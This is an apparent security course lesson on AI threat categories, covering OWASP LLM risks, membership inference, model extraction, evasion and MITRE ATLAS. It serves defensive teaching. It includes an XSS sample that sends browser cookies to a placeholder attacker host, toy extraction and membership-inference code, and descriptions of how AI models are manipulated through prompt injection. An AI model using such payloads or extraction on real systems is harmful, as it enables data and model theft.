
Module 3 Lesson 3: AI-Specific Threat Categories
Meet the new class of vulnerabilities. Explore unique AI threats recognized by OWASP and MITRE ATLAS, including Membership Inference and Model Extraction.
Beyond STRIDE, several security organizations have defined AI-specific threat lists. Understanding these categories is essential for professional auditing.
```mermaid
graph TD
    subgraph "AI Threat Pillars"
        I[Injection] --- I1[Prompt Injection]
        I --- I2[Indirect Injection]
        I --- I3[Tool Injection]
        E[Extraction] --- E1[Model Stealing]
        E --- E2[Weight Theft]
        E --- E3[Data Reconstruction]
        F[Inference] --- F1[Membership Inference]
        F --- F2[Attribute Inference]
    end
```
1. The OWASP Top 10 for LLMs
The Open Worldwide Application Security Project (OWASP) maintains a dedicated Top 10 list for Large Language Model applications. Key entries include:
- LLM01: Prompt Injection: Manipulating the model's behavior through crafted input.
- LLM02: Insecure Output Handling: Trusting the LLM's output without validation, which can lead to cross-site scripting (XSS) or remote code execution (a short sketch follows this list).
- LLM06: Sensitive Information Disclosure: The model revealing its training data or system secrets.
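To make LLM02 concrete, here is a minimal sketch of insecure output handling. It assumes a hypothetical `llm_answer` string returned by a chatbot backend: the vulnerable path drops model output straight into a web page, while the safer path treats it like any other untrusted input.

```python
import html

# Hypothetical model output: the attacker got the LLM to emit a script tag.
llm_answer = (
    "Here is your summary. "
    '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
)

# Vulnerable: the model's text is trusted and rendered verbatim -> XSS.
unsafe_page = f"<div class='answer'>{llm_answer}</div>"

# Safer: escape model output before it touches HTML (and validate it before SQL, shells, or tools).
safe_page = f"<div class='answer'>{html.escape(llm_answer)}</div>"

print(unsafe_page)
print(safe_page)
```

The same discipline applies whenever LLM output is fed into SQL queries, shell commands, or downstream tools: the model is just another untrusted user.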
2. Inversion & Inference (Privacy Attacks)
These attacks exploit the statistical behavior of trained models and have no direct equivalent in traditional software:
- Membership Inference: An attacker determines whether a specific person's data (e.g., your medical record) was part of the training set by observing how confidently the model responds to carefully chosen queries (see the sketch after this list).
- Model Inversion: Reconstructing training examples, such as a face image or a passage of text, by repeatedly querying the model and analyzing its outputs.
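Below is a minimal sketch of a confidence-based membership inference test. It assumes only black-box access to a `predict_proba`-style API; the overfit model, the synthetic data, and the confidence threshold are illustrative stand-ins, not a real attack pipeline.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

rng = np.random.default_rng(0)
X_members = rng.normal(0, 1, size=(50, 5))    # records that were used for training
y_members = rng.integers(0, 2, size=50)       # random labels: the model can only memorize them
X_outsiders = rng.normal(0, 1, size=(50, 5))  # records the model has never seen

# A small, overfit model memorizes its training records.
model = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_members, y_members)

def guess_membership(record, threshold=0.75):
    """Guess 'member' when the model is suspiciously confident about a record."""
    confidence = model.predict_proba(record.reshape(1, -1)).max()
    return confidence >= threshold

member_rate = np.mean([guess_membership(r) for r in X_members])
outsider_rate = np.mean([guess_membership(r) for r in X_outsiders])
print(f"flagged as members: training records {member_rate:.0%}, unseen records {outsider_rate:.0%}")
```

The gap between the two rates is the privacy leak: the more a model memorizes, the easier membership is to infer.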
3. Extraction (Intellectual Property Attacks)
- Model Extraction/Stealing: An attacker queries your expensive, proprietary model thousands of times and uses the answers to train their own clone model for free (see the sketch after this list).
- Target: your company's unique R&D and decision logic encoded in the model weights.
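Here is a minimal sketch of that extraction loop, assuming the attacker can only call a hypothetical `victim_predict()` API: they label a batch of random queries with the victim's answers and fit a cheap clone on those answers. The models and data are illustrative stand-ins.

```python
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.tree import DecisionTreeClassifier

rng = np.random.default_rng(1)

# The "expensive, proprietary" victim model (a stand-in for a paid API).
X_private = rng.normal(0, 1, size=(500, 4))
y_private = (X_private[:, 0] + X_private[:, 1] > 0).astype(int)
victim = MLPClassifier(hidden_layer_sizes=(32,), max_iter=1000, random_state=1).fit(X_private, y_private)

def victim_predict(x):
    """The only interface the attacker sees: inputs in, labels out."""
    return victim.predict(x)

# Attacker: fire off thousands of queries, keep the answers, train a clone for free.
X_queries = rng.normal(0, 1, size=(2000, 4))
y_stolen = victim_predict(X_queries)
clone = DecisionTreeClassifier(random_state=1).fit(X_queries, y_stolen)

# Measure how faithfully the clone mimics the victim on fresh inputs.
X_test = rng.normal(0, 1, size=(500, 4))
agreement = np.mean(clone.predict(X_test) == victim_predict(X_test))
print(f"clone agrees with the victim on {agreement:.0%} of unseen queries")
```

Note that the clone never sees the private training data or the weights; the victim's answers alone are enough.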
4. Adversarial Evasion
- The "Invisible" Man: Changing a few pixels on a digital face so an AI "sees" a different person, but a human sees no change.
- The "Silent" Word: Adding a hidden frequency to an audio file that tells an AI to "Unlock the door," but sounds like music to a human.
5. MITRE ATLAS
Just as there is MITRE ATT&CK for traditional hacking, MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) maps the tactics and techniques used by attackers against AI systems. It includes stages such as the following (a small audit-tagging sketch follows the list):
- Reconnaissance: Gathering info on the target model.
- Initial Access: Getting a prompt into the system.
- Impact: The final damage (e.g., data theft or system shutdown).
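As an auditor, you can use those stage names as tags on your findings. The sketch below is a hypothetical note-taking structure, not part of ATLAS itself; the tactic names come from the list above and the finding text is invented for illustration.

```python
from dataclasses import dataclass

# Tactic names taken from the ATLAS stages listed above.
ATLAS_TACTICS = {"Reconnaissance", "Initial Access", "Impact"}

@dataclass
class Finding:
    """One audit observation, tagged with the ATLAS tactic it maps to."""
    tactic: str
    description: str

    def __post_init__(self):
        if self.tactic not in ATLAS_TACTICS:
            raise ValueError(f"unknown tactic: {self.tactic}")

audit_log = [
    Finding("Reconnaissance", "Public docs reveal the exact model family and version."),
    Finding("Initial Access", "Support chatbot accepts prompts pasted from customer emails."),
    Finding("Impact", "A crafted prompt made the bot email internal pricing data."),
]

for finding in audit_log:
    print(f"[{finding.tactic}] {finding.description}")
```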
Exercise: The Threat Matcher
- Match the following scenarios to the categories above:
- "An attacker clones your AI chatbot for $10." -> ?
- "An attacker finds out your CEO is in the training data." -> ?
- "A user tricks the AI into writing a malicious script." -> ?
- Why is "Insecure Output Handling" just as dangerous as "Prompt Injection"?
- Download the OWASP Top 10 for LLM PDF. Which threat do you think is the easiest to fix?
- Research: What is the "Adversarial Machine Learning" (AML) community, and how does it differ from the "Cybersecurity" community?
Summary
AI threats aren't just traditional hacks; they are often mathematical exploits of how models learn and generalize. By categorizing them into extraction, inference, and injection, you can build specific defenses for each type of risk.
Next Lesson: Thinking like the enemy: Adversarial thinking for AI systems.